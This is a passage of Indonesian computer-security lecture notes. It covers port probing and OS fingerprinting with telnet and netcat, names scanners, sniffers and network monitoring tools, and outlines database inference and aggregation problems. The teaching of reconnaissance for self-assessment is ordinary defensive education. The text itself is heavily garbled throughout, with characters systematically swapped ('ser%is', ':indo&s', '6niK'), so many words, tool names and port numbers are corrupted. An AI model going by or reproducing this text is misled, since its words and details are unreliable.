menggunakan program telnet. Misalnya untuk melihat apakah ada ser%is e!mail
dengan menggunakan 1M-P digunakan telnet ke port ;5 dan port 33G.
unix9 telnet target.host.com %"
unix9 telnet localhost ##$
Proram penuj! prob!n 'penuj! semua port otomat!s9 :
Paket probe untuk sistem 6,)P
` nmap
` strobe
` tcpprobe
Probe untuk sistem :indo& 75#7J#,-
` ,et+ab
` "yberkit
` ?gre
Proram &an memon!tor adan&a prob!n #e s&stem
Probing biasanya meninggalkan jejak di berkas log di system anda. /engan mengamati entry
di dalam berkas log dapat diketahui adanya probing. 1elain itu, ada juga program untuk
memonitor probe seperti paket program courtney, portsentry dan tcplogd.
O( 3IN2ERPRINTIN2
Fingerprinting ' $nalisa ?1 sistem yang ditujua agar dapat melihat database kelemahan
sistem yang dituju.
Metode Fingerprinting '
"ara yang paling kon%ensional '
o 1er%ice telnet ke ser%er yang dituju, jika ser%er tersebut kebetulan
menyediakan ser%is telnet, seringkali ada banner yang menunjukkan nama ?1
beserta %ersinya.
o 1er%ice F-P di port ;3. /engan melakukan telnet ke port tersebut dan
memberikan perintah B1C1-( anda dapat mengetahui %ersi dari ?1 yang
digunakan.
o Melakukan finger ke :eb ser%er, dengan menggunakan program netcat (nc).
"ara fingerprinting yang lebih canggih adalah dengan menganalisa respon sistem
terhadap permintaan (re_uest) tertentu. Misalnya dengan menganalisa nomor urut packet
-"P#)P yang dikeluarkan oleh ser%er tersebut dapat dipersempit ruang jenis dari ?1 yang
digunakan. $da beberapa tools untuk melakukan deteksi ?1 ini antara lain'
o nmap
o _ueso
2al ' =3
Keamanan Komputer
PEN22UNAAN PRO2RAM PEN/ERAN2
6ntuk mengetahui kelemahan sistem informasi adalah dengan menyerang diri sendiri
dengan paket!paket program penyerang (attack) yang dapat diperoleh di )nternet.
1elain program penyerang yang sifatnya agresif melumpuhkan sistem yang dituju, ada
juga program penyerang yang sifatnya melakukan pencurian atau penyadapan data.
6ntuk penyadapan data, biasanya dikenal dengan istilah Bsniffer(. Meskipun data tidak
dicuri secara fisik (dalam artian menjadi hilang), sniffer ini sangat berbahaya karena dia
dapat digunakan untuk menyadap pass&ord dan informasi yang sensitif. )ni merupakan
serangan terhadap aspek pri%acy.
"ontoh program penyadap (sniffer) antara lain'
o pcapture (6niK)
o sniffit (6niK)
o tcpdump (6niK)
o :ebP@ay (:indo&s)
PEN22UNAAN (I(TEM PEMANTAU 1ARIN2AN
1istem pemantau jaringan (net&ork monitoring) dapat digunakan untuk mengetahui
adanya lubang keamaman.
Misalnya apabila anda memiliki sebuah ser%er yang semetinya hanya dapat diakses oleh
orang dari dalam, akan tetapi dari pemantau jaringan dapat terlihat bah&a ada yang
mencoba mengakses melalui tempat lain. 1elain itu dengan pemantau jaringan dapat juga
dilihat usaha!usaha untuk melumpuhkan sistem dengan melalui denial of ser%ice attack
(/o1) dengan mengirimkan packet yang jumlahnya berlebihan.
,et&ork monitoring biasanya dilakukan dengan menggunakan protokol 1,MP (1imple
,et&ork Management Protocol).
Proram netEor# mon!tor!n - manaement :
.therboy (:indo&s), .therman (6niK)
2P ?pen%ie& (:indo&s)
Packetboy (:indo&s), Packetman (6niK)
1,MP "ollector (:indo&s)
:ebboy (:indo&s)
Proram pemantau jar!nan &an t!da# menuna#an (NMP :
iplog, icmplog, updlog, yang merupakan bagian dari paket iplog untuk memantau
paket )P, )"MP, 6/P.
iptraf, sudah termasuk dalam paket +inuK /ebian netdiag
net&atch, sudah termasuk dalam paket +inuK /ebian netdiag
ntop, memantau jaringan seperti program top yang memantau proses di sistem 6niK
trafsho&, menunjukkan traffic antar hosts dalam bentuk teKt!mode
2al ' =;
Keamanan Komputer
2al ' =<
Keamanan Komputer
KEAMANAN DATA0A(E
Penyerangan /atabase
)nformasi sensitif yang tersimpan di dalam database dapat terbuka (disclosed) bagi orang!
orang yang tidak diiEinkan (unauthoriEed ).
)nformasi sensitif yang tersimpan di dalam database dapat altered in an unacceptable
manner
)nformasi sensitif yang tersimpan di dalam database dapat inaccessible bagi orang!orang
yang diiEinkan.
the underlying operating system may be attacked !! most difficult problem
/atabase )nference Problem
Malicious attacker may infer sensiti%e information (that is hidden) from information on a
database that is deemed not sensiti%e (made public)
More difficult problem' attacker may infer information combining &hats on the database
&ith &hat is already kno&n
/atabase $ggregation Problem
Bagian!bagian informasi tidak sensiti%e, dan menjadi sensiti%e ketika digabungkan secara
bersamaan.
"ontrols for the aggregation problem
o 2oney&ell +?"0 /ata Mie&s (+/M) database system ; pieces of data
labeled as nonsensiti%e, aggregates labeled as sensiti%e
o 1@) 1eaMie& database system ; pieces of data labeled as sensiti%e, aggregates
may then be labeled as non sensiti%e
Polyinstantiation, a "ontrol $gainst /isclosure
-his approach in%ol%es different %ie&s of a database object eKisting
for users &ith different security attributes
$ddresses the a//re/ation problem by pro%iding different security
labels to different aggregates separately
$ddresses the inference problem by pro%iding a means for hiding
information that may be used to make inferences
/atabase $pplications on 1ecure Bases
Most database applications rely on underlying ser%ices of an operating system
.Kporting these ser%ices from a -"B &ould enhance the security of the
database
o database keys implemented using security labels from underlying -"B
o -"B keeps audit records of operations on database
o ?1 file system protection eKtended to database
2al ' ==